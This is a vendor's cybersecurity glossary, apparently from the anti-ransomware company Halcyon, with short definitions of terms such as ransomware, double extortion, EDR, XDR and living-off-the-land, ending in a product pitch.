Cybersecurity Glossary

Our comprehensive guide to the complex terminology of the digital security realm. As the landscape of cybersecurity continues to evolve at a rapid pace, we believe in empowering our users with a clear understanding of the terms and concepts that shape this field. This glossary serves as an essential resource, providing succinct and easily-digestible explanations for both foundational and advanced cybersecurity jargon.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

A

Air Gapping

Read more

Air Gapping is a security measure that ensures a device or system has limited or no connectivity and is physically isolated from any other device or system such as the public Internet or a local area network. This means the device has no interface controllers connected to other networks, creating a physical or conceptual “air gap."

Read more

A

Anti-Ransomware

Read more

Anti-Ransomware is a software or tool designed to prevent, detect, and respond to ransomware attacks on computer systems and networks. Most endpoint protection solutions were trained on characteristics that all malware share, including some ransomware samples in the mix. But ransomware does not behave like other malware, so training detection models on the few characteristics that ransomware shares with other malware leave a lot of room for missed detections. Conversely, anti-ransomware detection models are trained on characteristics that all ransomware share to deliver more efficient and effective detection of ransomware attacks.

Read more

A

Antivirus (AV)

Read more

Antivirus (AV) is legacy a software tool designed to detect and prevent known commodity malware from executing a device or network. AV does not provide protection against novel, polymorphic repacked or otherwise altered forms of malware. AV requires human analysis and detection signature development as well as daily updates and lengthy scanning procedures that require a lot of resources and significantly impact productivity while only offering a modicum of protection. AV is best suited for personal computing use, but does not offer the level of protection organizations require from advance threats.

Read more

A

Archiveus Trojan

Read more

Archiveus Trojan was one of the earliest ransomware viruses created that encrypts files on a victim's computer and demands payment in exchange for the decryption key.

Read more

A

Artificial Intelligence (AI) in Security

Read more

Artificial intelligence (AI) is a vast branch of computer science concerned with a development in software that allows computer systems to perform tasks that imitate human cognitive intelligence. The use of advanced machine learning (ML) algorithms to automate and enhance the detection, prevention and response to cyberattacks.

Read more

B

Big-game Hunting

Read more

Cyberattacks that are customized to compromise high-value targets and large organizations.

Read more

B

Bitcoin

Read more

Bitcoin is a decentralized digital currency that is often used as a form of payment in ransomware attacks due to its anonymity and difficulty to trace.

Read more

B

Botnet

Read more

Short for “robot network” a botnet is a network of computers or multiple devices that are under control of an attacker or attacking party. When a system or computer is compromised it becomes a “bot” and is controlled by the “bot-herder” or “bot-master.”

Read more

C

Crypto Ransomware

Read more

Crypto ransomware is another term for malicious software that encrypts a victim's files and demands payment in exchange for the decryption key.

Read more

C

Cryptocurrency

Read more

A digital or virtual currency that uses cryptography for security and operates independently of a central bank, often used as a form of payment in ransomware attacks due to its anonymity and difficulty to trace.

Read more

C

Cyber Insurance

Read more

Cyber insurance is a type of insurance policy that reduces the financial risk to businesses and individuals in the event of a cyberattack. Cyber insurance is a good complement to a robust security program, but it is not a replacement for an active defense posture. In order to make a claim against a cyber insurance policy, insurers typically require the insured to deploy and maintain adequate security controls. Failure to adhere to the security requirements may render the policy unenforceable and negate any claims.

Read more

D

Data Exfiltration

Read more

The unauthorized transfer of sensitive or confidential data from a computer or network to an external location or attacker-controlled server. Today's more complex ransomware operations are multi-staged attacks,\ where the threat actors are looking to infiltrate as much of the targeted network as possible while exfiltrating sensitive data along the way. They threaten to expose the stolen data to put more pressure on the victim to pay the ransom demand and receive the decryption key to restore their systems. In some cases, the attackers will demand an additional payment for the stolen data in addition to the initial ransom.

Read more

D

Decryption

Read more

The process of converting encrypted data back into its original, readable form using a key or password. In a ransomware attack, the threat actors typically offer to provide a decryption key to restore systems and data. Decrypting in this manner is a manual process that needs to be conducted on every impacted device, and often the decryption keys provided by attackers either fail or return corrupted data. Organizations can protect their data and make it more easily recoverable in the event of a ransomware attack if they maintain isolated data backups.

Read more

D

Double Extortion

Read more

Double extortion is a ransomware tactic where cybercriminals not only encrypt the victim's data but also threaten to release sensitive information unless a ransom is paid. Other forms of double extortion, sometimes referred to as triple or quadruple extortion include threatening denial of service attacks (DoS), threatening to expose customer or partner data, short-selling a company's stock, or other tortious business interference tactics.

Read more

E

Endpoint Detection and Response (EDR) is a security solution that allows security teams to monitor, detect and investigate suspicious activity on hosts and endpoints. It employs automation that allows security teams to quickly identify and respond to threats. EDR is a powerful tool for protecting endpoints but has serious shortcomings with regard to things like preventing the abuse of user credentials, protecting the larger network and cloud deployments, or leveraging telemetry from other sources.

Read more

E

Encryption

Read more

Encryption is the process of converting data into a code to prevent unauthorized access or modification during transmission or storage. In the final stages of a ransomware attack, threat actors deploy the ransomware payload and encrypt the target's data, files and systems rendering them inaccessible. They typically will offer a decryption key in exchange for a ransom payment ranging from hundreds to tens of millions of dollars.

Read more

E

Encryption Key

Read more

An encryption key is a code or password used to encrypt and decrypt data in order to protect it from unauthorized access or theft in the event of a ransomware attack. In the final stages of a ransomware attack, threat actors deploy the ransomware payload and encrypt the target's data, files and systems rendering them inaccessible. They typically will offer a decryption key in exchange for a ransom payment ranging from hundreds to tens of millions of dollars.

Read more

E

Endpoint Detection and Response (EDR)

Read more

Endpoint Detection and Response (EDR) is a security solution that allows security teams to monitor, detect and investigate suspicious activity on hosts and endpoints. It employs automation that allows security teams to quickly identify and respond to threats. EDR is a powerful tool for protecting endpoints but has serious shortcomings with regard to things like preventing the abuse of user credentials, protecting the larger network and cloud deployments, or leveraging telemetry from other sources.

Read more

E

Endpoint Protection (EPP)

Read more

Endpoint Protection (EPP) is a security solution that protects individual devices, such as laptops and mobile devices, from cyber threats such as ransomware.

Read more

E

Extended Detection and Response (XDR)

Read more

Extended Detection and Response (XDR) is a comprehensive security solution that extends EDR by correlating telemetry from multiple sources beyond endpoints (network, cloud, identity, etc.) to detect, investigate, and respond to advanced threats such as multi-stage ransomware attacks. XDR holds much promise, but it is still in its infancy and has years of development ahead before it can deliver on its promised potential.

Read more

I

Immutability

Read more

Immutability refers to the security and integrity of an organization’s critical data, especially backup data, and the assurance that this data cannot be altered or destroyed.

Read more

I

Incident Response

Read more

Incident response (IR) is the set of immediate actions that an organization takes in response to a cyber attack or data breach. A tested IR plan, or playbook, can help address incidents efficiently and contain them before they spread.

Read more

L

Living-off-the-Land (LotL)

Read more

A technique used by cyber criminals to evade detection by abusing legitimate network tools, binaries, and processes already present on a targeted system to carry out their attacks.

Read more

L

Locker Ransomware

Read more

Locker ransomware is an earlier type of ransomware that encrypts a victim's files and demands payment in exchange for the decryption key, while also locking the victim out of their system.

Read more

M

Managed Detection and Response (MDR) is a service that offers third-party threat detection and response that are otherwise undertaken in-house. MDR offers enhanced protection to organizations that either do not have the personnel or resources to support security operations or find managed services for some aspects of security operations to be financially optimal.

Read more

M

Machine Learning

Read more

Machine learning (ML) is a branch of Artificial Intelligence (AI) that uses algorithms to teach computer systems to learn and program themselves in order to classify data and/or predict future outcomes.

Read more

M

Machine Learning (ML) in Security

Read more

Machine learning in security refers to the use of algorithms and statistical models to analyze and identify patterns in data to detect and prevent cyberattacks, including ransomware.

Read more

M

Malware

Read more

Malware is malicious software, code, and scripts that are designed to harm or exploit computer systems. Ransomware is a type of malware which encrypts files and demands payment for their release.

Read more

M

Managed Detection and Response (MDR)

Read more

Managed Detection and Response (MDR) is a service that offers third-party threat detection and response that are otherwise undertaken in-house. MDR offers enhanced protection to organizations that either do not have the personnel or resources to support security operations or find managed services for some aspects of security operations to be financially optimal.

Read more

M

Managed Security Service Provider (MSSP)

Read more

A Managed Security Service Provider (MSSP) is a third-party company that provides cybersecurity services to organizations, including monitoring, threat detection, incident response, and remediation.

Read more

N

Next Generation Antivirus (NGAV)

Read more

Next Generation Antivirus (NGAV) is a type of cybersecurity software that uses advanced techniques such as machine learning and behavioral analysis to detect and prevent ransomware attacks.

Read more

P

Phishing

Read more

Phishing is a type of social engineering attack where a threat actor sends fraudulent emails or messages to trick individuals into revealing sensitive information or downloading malware.

Read more

P

Playbook/Runbook

Read more

A Cyber Security Playbook defines the roles and responsibilities for members of an organization in response to a cyber security incident. It identifies the communications team and a contact liaison between the board and the rest of the organization. Playbooks also establish formal processes and procedures to ensure that required steps are systematically followed during the response and investigation. This helps organizations meet and comply with regulatory frameworks like NIST or GDPR. Playbooks support procedures, like breach notification and technical processes such as malware reverse engineering.

Read more

R

Ransomware-as-a-Service (RaaS) operators provide the software platform and backend to launch attacks. They have development teams constantly improving their feature sets, they assist in negotiations during a successful attack, they manage customer service agents, market to new affiliates, and more all for a slice of the profits.

Read more

R

Ransomware

Read more

Ransomware is a type of malware that encrypts a victim’s data, files, and systems before a ransom demand is paid and the attackers provide the victim with a decryption key to restore access.

Read more

R

Ransomware Attack

Read more

A ransomware attack uses malicious code to encrypt a victim’s data, files, and systems until a ransom payment is received and the attackers provide the victim with a decryption key to restore access.

Read more

R

Ransomware Campaign

Read more

A ransomware campaign is a coordinated attack operation designed to compromise and infect multiple targets with ransomware to encrypt data, files, and systems until a ransom payment is received and the attackers provide the victim with a decryption key to restore access.

Read more

R

Ransomware Gang

Read more

References to ransomware gangs are generally in regard to Ransomware-as-a-Service (RaaS) operators who provide the software platform and backend to launch attacks. They have development teams constantly improving their feature sets, they assist in negotiations during a successful attack, they manage customer service agents, market to new affiliates, and more all for a slice of the profits. Ransomware variants and ransomware gangs often share the same nomenclature, but that is not always the case.

Read more

R

Ransomware Prevention

Read more

The proactive measures taken to prevent ransomware attacks, such as implementing security software, training employees on safe online practices, and regularly backing up important data.

Read more

R

Ransomware Protection

Read more

Businesses of all sizes are vulnerable to cyberattacks like ransomware. To protect against this increasing risk, business owners can invest in endpoint protection solutions and educate themselves about how to prevent, mitigate and be resilient against the potential impact of ransomware attack on operations.

Read more

R

Ransomware Recovery

Read more

Ransomware recovery is the incident response, investigation, and remediation procedures that address a ransomware attack and its potential impact to a victim organization.

Read more

R

Ransomware Rollback

Read more

The process of restoring data and systems to the previous unencrypted state before a ransomware attack occurred.

Read more

R

Ransomware-as-a-Service (RaaS)

Read more

Ransomware-as-a-Service (RaaS) operators provide the attack platform and other mechanisms to carry out ransomware attack campaings. They have development teams constantly improving their feature sets, they assist in negotiations during a successful attack, they manage customer service agents, market to new affiliates and more for a portion of the ransom proceeds.

Read more

R

Resilience

Read more

Resilience is the ability of an organization, tool, or environment to adapt to changing conditions and prepare for, withstand, and recover quickly from disruption.

Read more

R

Resilience in Security

Read more

The ability of a system or organization to withstand and recover from cyberattacks, including ransomware, through proactive measures such as backups, incident response plans, and employee training.

Read more

S

A Service Level Agreement (SLA) is a document that defines the level of service expected from a vendor. It lists the specific metrics to measure the services rendered and compensatory actions if those service levels are not achieved. An SLA is a critical component of any technology vendor contract.

Read more

S

SOC/SOCaaS

Read more

A Security Operations Center (SOC) is an organization’s central command post that monitors and analyzes data from across all of its networks, devices, and databases. The goal is to improve the overall security posture while preventing, detecting, analyzing, and responding to cybersecurity incidents. Some organizations outsource their SOC functions and infrastructure to a third-party technology vendor such as an MSP or MSSP.

Read more

S

Scareware

Read more

Scareware is a type of malicious software that tricks users into believing their computer is infected with a virus or other malware, and then prompts them to purchase fake antivirus software or pay a ransom to remove the supposed threat.

Read more

S

Social Engineering

Read more

Social engineering attacks are the most common way ransomware operators get initial access to a targeted network. Phishing via malicious emails or messages on social platforms is a favorite tactic. Specially crafted emails are designed to trick targets into clicking malicious links, opening tainted attachments, or providing sensitive information like user credentials. Attackers who have already successfully infiltrated a network may also use social engineering techniques to compromise identities that have more user privileges at a targeted organization, like network admins and company executives.

Read more

T

Tabletop Exercise

Read more

A simulated scenario designed to test an organization's response to a cyberattack, allowing them to identify weaknesses and improve its incident response plan.

Read more

T

Threat Hunting

Read more

The proactive process of searching for and identifying potential cyber threats and active attacks before they can cause harm to a system or network.

Read more

T

Time-to-Ransom

Read more

The amount of time it takes for a ransomware attack to encrypt a victim's data and demand payment for its release.

Read more

T

Triple Extortion

Read more

Triple extortion is a technique where cybercriminals not only encrypt the victim's data but also apply multiple extortion methods to compel a ransom payment, like threatening to attack a victim's customers or partners or commencing a denial of service attack (DoS) in addition to the threat of leaking compromised data if a ransom payment is not received. See "Double Extortion" for more details.

Read more

Z

Zero-Day

Read more

A zero-day vulnerability is a security flaw in software or hardware that is unknown to the party responsible for patching or otherwise fixing the flaw.

Read more

The Halcyon Platform

Halcyon is the industry’s first dedicated, adaptive security platform focused specifically on stopping ransomware attacks. Halcyon is built by attackers to stop attackers. The solution is a lightweight agent that combines multiple proprietary advanced prevention engines along with AI models trained solely on ransomware.

Interested in getting a demo? Fill out the form and let’s talk!

Get a Demo

Meet with a Halcyon Anti-Ransomware Expert